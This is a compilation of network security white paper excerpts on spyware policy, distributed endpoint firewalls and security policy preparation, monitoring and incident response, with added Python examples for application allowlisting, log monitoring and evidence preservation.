An effective company-wide policy should specifically address the ways in which spyware may enter, including browsing to non-work-related sites, opening unsolicited e-mail attachments, and installing unauthorised and/or non-work-related applications. If such activities are allowed, the AUP should establish configuration and usage procedures that help to protect the company against inadvertent pest installation. While AUPs are an effective employee education method, they are not sufficient on their own to protect against intentional or accidental violations. Nor is it sufficient to let individual users employ their own favourite anti-spyware products: spyware can migrate from one PC to another attached to internal e-mails and other communications. The best approach is a networked anti-spyware solution that provides a level of centralised management which ensures all your PCs and servers are covered and alerts the IT manager to spyware incursions.

2. Threat-specific Protection

Unauthorised third parties will always find new ways to access forbidden data or resources. As noted previously, antivirus programs do not provide reliable protection against spyware; therefore, dedicated tools are required.

Businesses considering the deployment of company-wide protection against spyware, adware and other malicious applications will benefit from solutions that:

o Address legal and regulatory issues: As a starting point, an effective strategy should address the local, national and international legislation regarding confidentiality and integrity of customer, financial and employee data.

o Minimise strain on computing resources: The software should provide comprehensive protection against a variety of threats without consuming significant bandwidth or operating resources on servers and client computers.

o Decrease end-user interaction: Pest-prevention software should operate transparently so that employees cannot bypass or disable the protection.

o Reduce IT overhead: To free IT staff to focus on more strategic projects, the software should offer automatic deployment, trickle-down updates and centralised reporting and management.

o Enable flexible file handling: Because there may be legitimate business uses for potentially suspect applications, such as file-sharing programs and network packet sniffers, administrators should be able to make case-by-case decisions about which kinds of tools may be allowed in specific circumstances.

o Support the improvement of company-wide protection: The protection software should offer comprehensive event-logging capabilities so that administrators can spot trends and update acceptable use policies and firewall configurations accordingly.
II. Network Security-Related Issues

Source: “New Threats, New Solutions: Enterprise Endpoint Security”, available at
download.zonelabs.com/bin/media/pdf/Hurwitz_wp.pdf


In  the  rapidly  evolving  world  of  network  security,  there’s  a thin 
line  between  paranoia  and  prudent  protection.  Hackers  are  grow- 
ing in  both  number  and  sophistication,  and  the  stakes  are  rising 
every  day.  New  technologies  have  triggered  a shift  in  the  network 
security  paradigm,  expanding  vulnerability  exponentially. 

Distributed  personal  firewalls  are  needed  to  protect  corporate 
networks  from  Internet-enabled  espionage,  sabotage,  and  vandal- 
ism. Each  individual  PC— local  and  remote— must  employ  security 
technology  to  prevent  known  and  unknown  attacks.  Real-world 
security  needs  to  be  flexible  and  make  intelligent  use  of  Policy 
Lifecycle  Management  to  balance  protection  with  productivity. 

Enterprise  Networks  At  Risk 

As  networks  become  larger,  more  complex,  and  more  distributed, 
corporations  face  a growing  vulnerability  to  hacker  attacks  and 
industrial  espionage.  Security  consciousness  and  security  spend- 
ing are  both  on  the  increase,  but  not  at  a sufficient  pace  to  stay 
ahead  of  the  growing  threat.  The  DefCon  Internet  Security  site 
estimated  that  in  2002,  approximately  19  million  people  had  the 
skills  to  mount  a cyber  attack.  According  to  a CSI/FBI  survey,  a new 
generation  of  profit-motivated  hackers  raised  the  stakes  for  corpo- 
rate security  managers.  They  used  Trojan  horses  such  as  Back 
Orifice,  Sub7,  and  other  custom  spyware  to  control  remote 
machines,  steal  passwords,  and  compromise  corporate  networks. 
Hackers  randomly  scan  for  vulnerabilities  and  deploy  viruses  to 
harvest  IP  addresses  and  information. 

Once  inside,  hackers  can  conduct  espionage  or  sabotage,  steal 
financial  information,  disrupt  business,  and  cause  public  embar- 
rassment. Even  networks  with  VPN  tunnels  are  at  risk.  The  VPN 
will  secure  the  data  in  transit,  but  leaves  the  endpoints  vulnera- 
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ble.  Data  delivered  safely  can  be  harvested  by  Trojans  at  the 
exposed  endpoints.  Whether  a hacker’s  goal  is  vandalism  or  illicit 
profit,  the  costs  can  be  enormous.  Computer  Economics,  an  inde- 
pendent research  firm,  estimated  global  financial  damage  from 
malicious  code  in  2000  at  $17.1  billion.  mi2g,  a London-based  e- 
commerce  research  and  development  company,  put  the  mark  even 
higher,  at  $20  billion. 

New  technologies  have  triggered  a paradigm  shift  in  network 
security.  In  the  old  network  model,  almost  all  PCs  connected  to  the 
Internet  via  a central  gateway.  Guarding  the  gateway  effectively 
created  a defensive  perimeter.  This  model  is  no  longer  adequate. 

First,  while  corporate  networks  shored  up  their  security  with 
centralised  firewalls,  anti-virus  and  intrusion  detection,  hackers 
exposed  other  vulnerabilities.  Second,  the  explosion  of  remote 
and  mobile  users  with  always-on,  broadband  Internet  connections 
to  the  network  means  most  networks  now  have  hundreds,  or  even 
thousands,  of  vulnerable  ‘backdoors’. 

The  Gartner  Group  noted,  “Broadband  connections  are  rife 
with  threats  to  remote  devices.  Viruses,  Trojan  horses,  zombies, 
keystroke  monitoring,  file  shares  and  denial-of-service  attacks  all 
threaten  the  remote  machine  and,  by  extension,  put  the  enter- 
prise’s IT  resources  at  risk.”  Microsoft  and  others  were  hacked  in 
this  way.  Incursions  of  this  sort  can  quickly  turn  into  high-profile 
PR  disasters,  or  worse,  go  undetected  for  months  before  being 
exposed.  Vulnerability  has  expanded  exponentially.  As  companies 
go  from  single  gateways  to  thousands  of  Internet  connected  end- 
points, the  number  of  vulnerabilities  for  networks  has  exploded. 
IDC  reported  the  number  of  remote  users  in  the  year  2000  at  39 
million  and  growing  nine  percent  annually. 

This accelerating trend is creating even more back doors. In
addition, laptop users physically bypass the firewall every day, and
wireless networks have no definable boundaries. Effectively, the
network perimeter has disappeared. Hackers have taken notice, and so
have government regulators: recent legislation requiring tighter
security in the healthcare and financial services industries is a
telling sign of the times, and a reminder of how much we all have
to lose.

Centrally-Managed  Endpoint  Security 

Prolific  threats  require  a pervasive  solution.  To  reclaim  peace  of 
mind  and  control  of  the  network  perimeter,  each  endpoint  must 
be  secured.  Distributed  endpoint  security,  centrally  managed  per- 
sonal firewalls,  and  application  control  technology  offer  the  best 
defence  against  attacks  that  threaten  corporate  productivity,  data, 
and  reputation.  IDC  notes,  “. . .as  ‘always-on’  Internet  access  grows 
(with  digital  subscriber  line  [DSL]  and  cable  modems)  and  as  more 
companies  allow  telecommuting,  the  need  for  distributed  and 
personal  firewalls  will  grow.”  Consequently,  Peter  Lindstrom  of 
the  Hurwitz  Group  stated,  “The  personal  firewall  may  well 
become  more  significant  in  the  long  run  than  the  corporate  fire- 
wall.” Personal  firewalls  and  application  control  can  also  help 
secure  endpoints  behind  the  corporate  firewall,  by  preventing 
internal  hacking,  unknown  Trojans,  and  spyware  from  exposing 
sensitive  data  outside  the  corporation. 

Similar  to  a corporate  network,  each  individual  PC— local  and 
remote— must  employ  multiple  approaches  to  security  technology. 
Only  a policy-based,  application-oriented  distributed  firewall,  on 
each  and  every  enterprise  PC,  can  provide  the  protection  needed 
to  stop  thousands  of  new  and  unknown  hacking  combinations 
and  techniques. 

For  true  endpoint  security,  a distributed  firewall  must  incorporate 
the  following  functions: 

o Obscure  PCs  to  prevent  outside  access  from  hackers 
o Prevent  applications  from  becoming  hacker  tools  by  allowing 
only  authenticated  and  approved  applications  to  access  the 
Internet 

o Secure  e-mail  attachments  to  prevent  e-mail  from  being  used  as 
a transmission  tool  for  viruses  and  malicious  worms 
o Block,  alert  and  log  intrusions 

o Provide cooperative gateway protection to leverage the existing
IS infrastructure and ensure that only endpoints with distributed
firewalls and current security policy access the network
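The second function in the list above, allowing only authenticated and approved applications to reach the Internet, is the heart of application control. The following Python sketch is an added illustration of that policy check and is not the code of any product mentioned in this section: the application paths, the in-memory stand-ins for executables, and the port lists are constructed samples. An application is allowed out only if policy approves it, its executable still hashes to the value recorded at approval time, and the destination port is one the policy permits for that application; every decision is written to an audit log.

```python
"""Policy-based application control for a distributed (per-endpoint)
firewall: an application may open an Internet connection only if policy
approves it, the executable still matches the hash recorded at approval
time, and the destination port is one the policy allows for that
application. Everything else is blocked and written to an audit log.
Added illustration of the idea in the text, not the code of any product;
paths and "binaries" below are constructed samples."""
import hashlib
from dataclasses import dataclass, field

# Constructed stand-ins for on-disk executables (a real agent would hash
# the file the process was started from).
SAMPLE_BINARIES = {
    r"C:\Program Files\Mail\mail.exe": b"mail-client-build-1",
    r"C:\Program Files\Browser\browser.exe": b"browser-build-7",
    r"C:\Users\alice\AppData\Local\Temp\update.exe": b"unknown-dropper",
}


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


@dataclass
class AppRule:
    path: str
    sha256: str                              # hash of the executable when approved
    allowed_ports: frozenset = frozenset()   # empty set means any port


@dataclass
class EndpointPolicy:
    rules: dict = field(default_factory=dict)    # path -> AppRule
    audit_log: list = field(default_factory=list)

    def approve(self, path: str, binary: bytes, allowed_ports=()) -> None:
        """Record an application as approved, binding it to its hash."""
        self.rules[path] = AppRule(path, sha256_hex(binary), frozenset(allowed_ports))

    def decide(self, path: str, binary: bytes, dst_host: str, dst_port: int) -> str:
        """Return 'ALLOW' or 'BLOCK' for an outbound connection attempt."""
        rule = self.rules.get(path)
        if rule is None:
            verdict, reason = "BLOCK", "application not on approved list"
        elif rule.sha256 != sha256_hex(binary):
            # The file changed since approval: a patched or trojaned copy
            # inherits nothing from the original's approval.
            verdict, reason = "BLOCK", "executable hash mismatch"
        elif rule.allowed_ports and dst_port not in rule.allowed_ports:
            verdict, reason = "BLOCK", f"port {dst_port} not permitted for this application"
        else:
            verdict, reason = "ALLOW", "approved application, hash verified"
        self.audit_log.append(
            {"app": path, "dst": f"{dst_host}:{dst_port}", "verdict": verdict, "reason": reason})
        return verdict


def demo() -> dict:
    """Four connection attempts against one policy; returns their verdicts."""
    policy = EndpointPolicy()
    mail = r"C:\Program Files\Mail\mail.exe"
    browser = r"C:\Program Files\Browser\browser.exe"
    dropper = r"C:\Users\alice\AppData\Local\Temp\update.exe"
    policy.approve(mail, SAMPLE_BINARIES[mail], allowed_ports={25, 143, 587, 993})
    policy.approve(browser, SAMPLE_BINARIES[browser])   # any port
    return {
        "mail to imaps": policy.decide(mail, SAMPLE_BINARIES[mail], "mail.example.com", 993),
        "mail to http": policy.decide(mail, SAMPLE_BINARIES[mail], "203.0.113.10", 80),
        "unapproved dropper": policy.decide(dropper, SAMPLE_BINARIES[dropper], "203.0.113.10", 443),
        "tampered browser": policy.decide(browser, b"browser-build-7-backdoored", "example.com", 443),
    }


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{verdict:5} {name}")
```

The hash binding is what makes the approval worth anything: a rule keyed on the file name alone would let any program dropped under an approved name inherit that program's Internet access. The per-application port list is the "policy-based" part; a mail client that suddenly talks to port 80 is exactly the kind of behaviour the audit log should surface.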

Combined, these security functions and others protect each
individual PC—local and remote. By distributing and enforcing PC
security and security policy across all endpoints, the chances of
a security breach are greatly reduced, thereby offering greater
protection to the entire network. Real-world security has to be
flexible: threats, organisations, and corporate networks change. It
is a fact of life that attackers will learn and adapt in an attempt
to circumvent defences. And, policy that once supported
productivity may later thwart it. Real-world security solutions have
to evolve to respond to new threats and changing organisational
needs.

Flexible  security  policy  management  is  critical  for  maintaining 
maximum  corporate  security.  Policy  Lifecycle  Management  is  the 
key  to  maximizing  corporate  security  and  productivity.  Centrally 
managed  policy  provides  an  enforcement  mechanism  to  ensure  all 
endpoints  are  compliant.  Policy  Lifecycle  Management  optimises 
security  by  streamlining  policy  creation  and  providing  feedback, 
enforcing  and  updating  policy  at  all  times. 

III. Network Security: Best Practices

Source:  “Network  Security  Policy:  Best  Practices  White  Paper” 
available  at 

www.cisco.com/warp/public/126/secpol.html 


Without  a security  policy,  the  availability  of  your  network  can  be 
compromised.  The  policy  begins  with  assessing  the  risk  to  the  net- 
work and  building  a team  to  respond.  Continuation  of  the  policy 
requires  implementing  a security  change  management  practice  and 
monitoring  the  network  for  security  violations.  Last,  the  review 
process  modifies  the  existing  policy  and  adapts  to  lessons  learned. 

We  look  here  at  preparation,  prevention,  and  response,  in  detail. 

Preparation 

Prior  to  implementing  a security  policy,  you  must: 
o Create  usage  policy  statements 
o Conduct  a risk  analysis 
o Establish  a security  team  structure 

1.  Creating  Usage  Policy  Statements 

Creating  usage  policy  statements  that  outline  users’  roles  and 
responsibilities  with  regard  to  security  is  recommended.  You  can 
start  with  a general  policy  that  covers  all  network  systems  and 
data  within  your  company.  This  chapter  should  provide  the  gener- 
al user  community  with  an  understanding  of  the  security  policy, 
its  purpose,  guidelines  for  improving  their  security  practices,  and 
definitions  of  their  security  responsibilities.  If  your  company  has 
identified  specific  actions  that  could  result  in  punitive  or  discipli- 
nary actions  against  an  employee,  these  actions  and  how  to  avoid 
them  should  be  clearly  articulated  here. 

The next step is to create a partner-acceptable use statement to
provide partners with an understanding of the information that is
available to them, the expected disposition of that information, as
well as the conduct of the employees of your company. You should
clearly explain any specific acts that have been identified as
security attacks and the punitive actions that will be taken should
a security attack be detected.

Last,  create  an  administrator-acceptable  use  statement  to 
explain  the  procedures  for  user  account  administration,  policy 
enforcement,  and  privilege  review.  If  your  company  has  specific 
policies  concerning  user  passwords  or  subsequent  handling  of 
data,  clearly  present  those  policies  as  well.  Check  the  policy 
against  the  partner-acceptable  use  and  the  user  acceptable  use  pol- 
icy statements  to  ensure  uniformity.  Make  sure  that  administrator 
requirements  listed  in  the  acceptable  use  policy  are  reflected  in 
training  plans  and  performance  evaluations. 

2.  Conduct  A Risk  Analysis 

A risk  analysis  should  identify  the  risks  to  your  network,  network 
resources,  and  data.  This  doesn’t  mean  you  should  identify  every 
possible  entry  point  to  the  network,  nor  every  possible  means  of 
attack.  The  intent  of  a risk  analysis  is  to  identify  portions  of  your 
network,  assign  a threat  rating  to  each  portion,  and  apply  an 
appropriate  level  of  security.  This  helps  maintain  a workable  bal- 
ance between  security  and  required  network  access.  Assign  each 
network  resource  one  of  the  following  three  risk  levels: 

o Low Risk: Systems or data that if compromised (data viewed by
unauthorised personnel, data corrupted, or data lost) would not
disrupt the business or cause legal or financial ramifications.
The targeted system or data can be easily restored and does not
permit further access of other systems.

o Medium Risk: Systems or data that if compromised (data viewed
by unauthorised personnel, data corrupted, or data lost) would
cause a moderate disruption in the business, minor legal or
financial ramifications, or provide further access to other
systems. The targeted system or data requires a moderate effort to
restore or the restoration process is disruptive to the system.

o High Risk: Systems or data that if compromised (data viewed by
unauthorised personnel, data corrupted, or data lost) would cause
an extreme disruption in the business, cause major legal or
financial ramifications, or threaten the health and safety of a
person. The targeted system or data requires significant effort to
restore or the restoration process is disruptive to the business or
other systems.

Assign  a risk  level  to  each  of  the  following:  core  network  devices, 
distribution  network  devices,  access  network  devices,  network 
monitoring  devices,  network  security  devices,  e-mail  systems,  net- 
work file  servers,  network  print  servers,  network  application 
servers  (DNS  and  DHCP),  data  application  servers  (Oracle  or  other 
standalone  applications),  desktop  computers,  and  other  devices 
(standalone  print  servers  and  network  fax  machines).  Network 
equipment  such  as  switches,  routers,  DNS  servers,  and  DHCP 
servers  can  allow  further  access  into  the  network,  and  are  there- 
fore either  medium  or  high  risk  devices.  It  is  also  possible  that  cor- 
ruption of  this  equipment  could  cause  the  network  itself  to  col- 
lapse. Such  a failure  can  be  extremely  disruptive  to  the  business. 

Once  you’ve  assigned  a risk  level,  it’s  necessary  to  identify 
the  types  of  users  of  that  system.  The  five  most  common  types 
of  users  are: 

o Administrators: Internal users responsible for network resources
o Privileged: Internal users with a need for greater access
o Users: Internal users with general access
o Partners: External users with a need to access some resources
o Others: External users or customers

The identification of the risk level and the type of access
required of each network system forms the basis of the following
security matrix. The security matrix provides a quick reference for
each system and a starting point for further security measures,
such as creating an appropriate strategy for restricting access to
network resources.

System                  | Description                 | Risk Level     | Types of Users
------------------------|-----------------------------|----------------|-----------------------------------------------
ATM switches            | Core network device         | High           | Administrators for device configuration (support staff only); all others for use as a transport
Network routers         | Distribution network device | High           | Administrators for device configuration (support staff only); all others for use as a transport
Closet switches         | Access network device       | Medium         | Administrators for device configuration (support staff only); all others for use as a transport
ISDN or dial-up servers | Access network device       | Medium         | Administrators for device configuration (support staff only); partners and privileged users for special access
Firewall                | Access network device       | High           | Administrators for device configuration (support staff only); all others for use as a transport
DNS and DHCP servers    | Network applications        | Medium         | Administrators for configuration; general and privileged users for use
External e-mail server  | Network application         | Low            | Administrators for configuration; all others for mail transport between the Internet and the internal mail server
Internal e-mail server  | Network application         | Medium         | Administrators for configuration; all other internal users for use
Oracle database         | Network application         | Medium or High | Administrators for system administration; privileged users for data updates; general users for data access; all others for partial data access

3. Establish A Security Team Structure

Create a cross-functional security team led by a Security Manager
with participants from each of your company’s operational areas.
The representatives on the team should be aware of the security
policy and the technical aspects of security design and
implementation. Often, this requires additional training for the
team members. The security team has three areas of responsibilities:
policy development, practice, and response. Policy development is
focused on establishing and reviewing security policies for the
company. At a minimum, review both the risk analysis and the
security policy on an annual basis. Practice is the stage during
which the security team conducts the risk analysis, the approval
of security change requests, reviews security alerts from both
vendors and the CERT mailing list, and turns plain language security
policy requirements into specific technical implementations.

The  last  area  of  responsibility  is  response.  While  network  moni- 
toring often  identifies  a security  violation,  it  is  the  security  team 
members  who  do  the  actual  troubleshooting  and  fixing  of  such  a vio- 
lation. Each  security  team  member  should  know  in  detail  the  securi- 
ty features  provided  by  the  equipment  in  his  or  her  operational  area. 

While  we  have  defined  the  responsibilities  of  the  team  as  a 
whole,  you  should  define  the  individual  roles  and  responsibilities 
of  the  security  team  members  in  your  security  policy. 

Prevention 

Prevention  can  be  broken  into  two  parts:  approving  security 
changes  and  monitoring  security  of  your  network. 

1.  Approving  Security  Changes 

Security  changes  are  defined  as  changes  to  network  equipment 
that  have  a possible  impact  on  the  overall  security  of  the  network. 
Your  security  policy  should  identify  specific  security  configura- 
tion requirements  in  non-technical  terms.  In  other  words,  instead 
of  defining  a requirement  as  “No  outside  sources  FTP  connections 
will  be  permitted  through  the  firewall”,  define  the  requirement  as 
“Outside  connections  should  not  be  able  to  retrieve  files  from  the 
inside  network”.  You’ll  need  to  define  a unique  set  of  require- 
ments for  your  organisation. 

The security team should review the list of plain language
requirements to identify specific network configuration or design
issues that meet the requirements. Once the team has created the
required network configuration changes to implement the security
policy, you can apply these to any future configuration changes.
While it’s possible for the security team to review all changes,
this process allows them to only review changes that pose enough
risk to warrant special treatment.

We  recommend  that  the  security  team  review  the  following 
types  of  changes: 

o Any  change  to  the  firewall  configuration 
o Any  change  to  access  control  lists  (ACL) 

o Any  change  to  Simple  Network  Management  Protocol  (SNMP) 
configuration 

o Any  change  or  update  in  software  that  differs  from  the 
approved  software  revision  level  list 

It’s  also  recommended  to  adhere  to  the  following  guidelines: 

o Change  passwords  to  network  devices  on  a routine  basis 
o Restrict  access  to  network  devices  to  an  approved  list  of  personnel 
o Ensure  that  the  current  software  revision  levels  of  network 
equipment  and  server  environments  are  in  compliance  with  the 
security  configuration  requirements 

In  addition  to  these  approval  guidelines,  have  a representative 
from  the  security  team  sit  on  the  change  management  approval 
board,  in  order  to  monitor  all  changes  that  the  board  reviews.  The 
security  team  representative  can  deny  any  change  that  is  consid- 
ered a security  change  until  it  has  been  approved  by  the  security 
team. 

2.  Monitoring  Your  Network  Security 

Security  monitoring  is  similar  to  network  monitoring,  except  that  it 
focuses  on  detecting  changes  in  the  network  that  indicate  a security 
violation.  The  starting  point  for  security  monitoring  is  determining 
what  is  a violation.  In  ‘Conduct  a Risk  Analysis’,  we  identified  the 
level  of  monitoring  required  based  on  the  threat  to  the  system.  In 
‘Approving  Security  Changes’,  we  identified  specific  threats  to  the 
network.  By  looking  at  both  these  parameters,  we’ll  develop  a clear 
picture  of  what  you  need  to  monitor  and  how  often. 
In the Risk Analysis matrix, the firewall is considered a high-risk
network device, which indicates that you should monitor it in real
time. From the Approving Security Changes section, you see that you
should monitor for any changes to the firewall. This means that the
SNMP polling agent should monitor such things as failed login
attempts, unusual traffic, changes to the firewall, access granted
to the firewall, and connections set up through the firewall.

Following  this  example,  create  a monitoring  policy  for  each 
area  identified  in  your  risk  analysis.  It’s  recommended  to  monitor 
low-risk  equipment  weekly,  medium-risk  equipment  daily,  and 
high-risk  equipment  hourly.  If  you  require  more  rapid  detection, 
monitor  on  a shorter  time  frame.  Last,  your  security  policy  should 
address  how  to  notify  the  security  team  of  security  violations. 
Often,  your  network  monitoring  software  will  be  the  first  to  detect 
the  violation.  It  should  trigger  a notification  to  the  operations 
centre,  which  in  turn  should  notify  the  security  team,  using  a 
pager  if  necessary. 
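The risk analysis matrix from the Preparation section and the monitoring policy just described fit together naturally in code. The Python below is an added illustration, not part of the Cisco white paper: it takes a few rows of the security matrix, derives the polling interval from the risk level (weekly, daily or hourly, as recommended above), answers whether a given user type may perform an action on a system, and scans a firewall log for the indicators named for the high-risk firewall (failed logins, configuration changes and access grants). The log lines and their syslog-like format are constructed samples; a real deployment would feed the output of its SNMP polling agent or syslog collector through the same checks.

```python
"""Turning the risk analysis matrix and the monitoring policy into code.
Each system carries the risk level from the security matrix; that level
fixes how often it is polled (low: weekly, medium: daily, high: hourly,
as recommended in the text) and the matrix says which user type may do
what. Because the firewall is high risk, its log is scanned for the
indicators the text lists: failed login attempts, configuration changes
and access grants. Added illustration, not the white paper's own code;
the log lines are constructed samples in a syslog-like format."""
import re

# Polling interval in seconds per risk level (weekly / daily / hourly).
POLL_INTERVAL = {"low": 7 * 24 * 3600, "medium": 24 * 3600, "high": 3600}

# Rows lifted from the security matrix: system -> (risk level,
# {user type: permitted use}). "others" covers every type not listed.
SECURITY_MATRIX = {
    "firewall": ("high", {"administrators": "configuration", "others": "transport"}),
    "dns-dhcp": ("medium", {"administrators": "configuration",
                            "privileged": "use", "users": "use"}),
    "external-mail": ("low", {"administrators": "configuration",
                              "others": "mail transport"}),
    "oracle-db": ("high", {"administrators": "system administration",
                           "privileged": "data updates", "users": "data access",
                           "others": "partial data access"}),
}


def poll_interval(system: str) -> int:
    """Seconds between checks of `system`, derived from its risk level."""
    level, _ = SECURITY_MATRIX[system]
    return POLL_INTERVAL[level]


def permitted(system: str, user_type: str, action: str) -> bool:
    """Does the matrix allow `user_type` to perform `action` on `system`?"""
    _, uses = SECURITY_MATRIX[system]
    allowed = uses.get(user_type, uses.get("others"))
    return allowed == action


# Constructed log excerpt standing in for what the polling agent collects.
FIREWALL_LOG = """\
Mar 03 09:00:01 fw1 sshd: Accepted password for admin from 10.0.0.5
Mar 03 09:05:12 fw1 sshd: Failed password for root from 203.0.113.9
Mar 03 09:05:14 fw1 sshd: Failed password for root from 203.0.113.9
Mar 03 09:05:17 fw1 sshd: Failed password for root from 203.0.113.9
Mar 03 09:10:00 fw1 fwadmin: CONFIG CHANGE rule 42 modified by admin
Mar 03 09:11:30 fw1 fwadmin: ACCESS GRANTED user bob role operator
"""

INDICATORS = {
    "failed_login": re.compile(r"Failed password for (\S+) from (\S+)"),
    "config_change": re.compile(r"CONFIG CHANGE (.*)"),
    "access_granted": re.compile(r"ACCESS GRANTED (.*)"),
}


def scan_firewall_log(text: str, failed_login_threshold: int = 3) -> list:
    """Return one alert per indicator. Failed logins from one source are
    collapsed into a single alert raised when they reach the threshold,
    so a burst of guesses does not flood the operations centre."""
    alerts, failed = [], {}
    for line in text.splitlines():
        for kind, pattern in INDICATORS.items():
            match = pattern.search(line)
            if not match:
                continue
            if kind == "failed_login":
                user, source = match.groups()
                failed[source] = failed.get(source, 0) + 1
                if failed[source] == failed_login_threshold:
                    alerts.append({"kind": kind, "source": source,
                                   "user": user, "count": failed[source]})
            else:
                alerts.append({"kind": kind, "detail": match.group(1)})
    return alerts


if __name__ == "__main__":
    for system in SECURITY_MATRIX:
        print(f"{system:14} poll every {poll_interval(system)} s")
    for alert in scan_firewall_log(FIREWALL_LOG):
        print("ALERT", alert)
```

Two design points carry over to real tooling. First, the access check consults the matrix rather than the device, so a request that the matrix does not cover (a partner asking to "use" the DNS server) is refused rather than silently allowed. Second, the failed-login threshold is the policy knob that turns raw events into the single notification the text says should reach the operations centre and then the security team.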

3.  Response 

Response  can  be  broken  into  three  parts:  security  violations, 
restoration,  and  review. 

Security  Violations:  When  a violation  is  detected,  the  ability  to 
protect  network  equipment,  determine  the  extent  of  the  intru- 
sion, and  recover  normal  operations  depends  on  quick  decisions. 
Having  these  decisions  made  ahead  of  time  makes  responding  to 
an  intrusion  much  more  manageable. 

The  first  action  following  the  detection  of  an  intrusion  is  the 
notification  of  the  security  team.  Without  a procedure  in  place, 
there  will  be  considerable  delay  in  getting  the  correct  people  to 
apply  the  correct  response.  Define  a procedure  in  your  security 
policy  that  is  available  24  hours  a day,  7 days  a week.  Next  you 
should  define  the  level  of  authority  given  to  the  security  team  to 
make  changes,  and  in  what  order  the  changes  should  be  made. 

Possible corrective actions are:

o Implementing  changes  to  prevent  further  access  to  the  violation 
o Isolating  the  violated  systems 

o Contacting  the  carrier  or  ISP  in  an  attempt  to  trace  the  attack 
o Using  recording  devices  to  gather  evidence 
o Disconnecting  violated  systems  or  the  source  of  the  violation 
o Contacting  the  police,  or  other  government  agencies 

o Shutting  down  violated  systems 
o Restoring  systems  according  to  a prioritised  list 
o Notifying  internal  managerial  and  legal  personnel 

Be  sure  to  detail  any  changes  that  can  be  conducted  without 
management  approval  in  the  security  policy.  Last,  there  are  two 
reasons  for  collecting  and  maintaining  information  during  a secu- 
rity attack:  to  determine  the  extent  to  which  systems  have  been 
compromised  by  a security  attack,  and  to  prosecute  external  vio- 
lations. The  type  of  information  and  the  manner  in  which  you  col- 
lect it  differs  according  to  your  goal.  To  determine  the  extent  of 
the  violation,  do  the  following: 

o Record  the  event  by  obtaining  sniffer  traces  of  the  network, 
copies  of  log  files,  active  user  accounts,  and  network  connections 
o Limit  further  compromise  by  disabling  accounts,  disconnecting 
network  equipment  from  the  network,  and  disconnecting  from 
the  Internet 

o Backup  the  compromised  system  to  aid  in  a detailed  analysis  of 
the  damage  and  method  of  attack 
o Look  for  other  signs  of  compromise.  Often  when  a system  is 
compromised,  there  are  other  systems  or  accounts  involved 
o Maintain  and  review  security  device  log  files  and  network  mon- 
itoring log  files,  as  they  often  provide  clues  to  the  method  of 
attack 

If  you’re  interested  in  taking  legal  action,  have  your  legal 
department  review  the  procedures  for  gathering  evidence  and 
involvement  of  the  authorities.  Such  a review  increases  the  effec- 
tiveness of  the  evidence  in  legal  proceedings.  If  the  violation  was 
internal  in  nature,  contact  your  Human  Resources  department. 
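The first two items in the list above (record the event, then preserve copies for detailed analysis) only serve the second goal, prosecution, if the copies can later be shown to be unchanged. The Python below is an added illustration of that part of the procedure, not part of the Cisco white paper: it copies log files and captured volatile state (active accounts, network connections) into an evidence directory, writes a SHA-256 manifest with the collection time, marks the copies read-only, and can re-verify the manifest afterwards. The log contents and the captured snapshots are constructed samples; how the volatile state is captured on a given system is left to the caller.

```python
"""Preserving evidence when a violation is detected: copy the log files
and the captured volatile state (active accounts, network connections)
into an evidence directory and record a SHA-256 manifest so that later
analysis, and any legal proceedings, can show the copies are unchanged.
Added illustration, not from the source white paper; the sample log file
contents and volatile snapshots are constructed."""
import hashlib
import json
import os
import shutil
import tempfile
import time


def sha256_file(path: str) -> str:
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def collect_evidence(log_paths: list, volatile: dict, evidence_dir: str) -> dict:
    """Copy logs and write volatile snapshots, then a manifest of hashes.
    `volatile` maps a name (e.g. "active_users") to already-captured text."""
    os.makedirs(evidence_dir, exist_ok=True)
    manifest = {"collected_at": time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime()),
                "items": {}}
    for src in log_paths:
        name = os.path.basename(src)
        dst = os.path.join(evidence_dir, name)
        shutil.copy2(src, dst)            # copy2 keeps the original timestamps
        manifest["items"][name] = {"source": src, "sha256": sha256_file(dst)}
    for name, text in volatile.items():
        fname = name + ".txt"
        dst = os.path.join(evidence_dir, fname)
        with open(dst, "w") as handle:
            handle.write(text)
        manifest["items"][fname] = {"source": "volatile capture", "sha256": sha256_file(dst)}
    with open(os.path.join(evidence_dir, "MANIFEST.json"), "w") as handle:
        json.dump(manifest, handle, indent=2)
    # Read-only copies make accidental edits during analysis fail loudly.
    for name in manifest["items"]:
        os.chmod(os.path.join(evidence_dir, name), 0o444)
    return manifest


def verify_evidence(evidence_dir: str) -> list:
    """Names of items whose current hash no longer matches the manifest."""
    with open(os.path.join(evidence_dir, "MANIFEST.json")) as handle:
        manifest = json.load(handle)
    return [name for name, meta in manifest["items"].items()
            if sha256_file(os.path.join(evidence_dir, name)) != meta["sha256"]]


def demo():
    """Collect constructed evidence, verify it, then tamper with one copy
    to show the verification catches the change."""
    work = tempfile.mkdtemp()
    log = os.path.join(work, "auth.log")
    with open(log, "w") as handle:   # constructed sample log line
        handle.write("Mar 03 09:05:12 host sshd: Failed password for root from 203.0.113.9\n")
    volatile = {   # constructed stand-ins for captured command output
        "active_users": "alice pts/0 10.0.0.5\n",
        "connections": "tcp 10.0.0.7:22 203.0.113.9:51234 ESTABLISHED\n",
    }
    evidence = os.path.join(work, "evidence")
    manifest = collect_evidence([log], volatile, evidence)
    untouched = verify_evidence(evidence) == []
    target = os.path.join(evidence, "auth.log")
    os.chmod(target, 0o644)          # undo read-only to simulate tampering
    with open(target, "a") as handle:
        handle.write("tampered\n")
    return manifest, untouched, verify_evidence(evidence)


if __name__ == "__main__":
    manifest, untouched, tampered = demo()
    print("items:", sorted(manifest["items"]))
    print("verified after collection:", untouched)
    print("modified since collection:", tampered)
```

The manifest is the minimum a legal department will ask for when it reviews the evidence-gathering procedure: what was taken, from where, when, and a digest that any party can recompute. Signing the manifest, or copying it to write-once media, is the natural next step and is outside this example.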
Restoration: Restoration of normal network operations is the final
goal of any security violation response. Define in the security
policy how you conduct, secure, and make available normal backups.
As each system has its own means and procedures for backing up,
the security policy should act as a meta-policy, detailing for each
system the security conditions that require restoration from
backup. If approval is required before restoration can be done,
include the process for obtaining approval as well.

Review:  The  review  process  is  the  final  effort  in  creating  and  main- 
taining a security  policy.  There  are  three  things  you’ll  need  to 
review:  policy,  posture,  and  practice.  The  security  policy  should  be  a 
living  document  that  adapts  to  an  ever-changing  environment. 
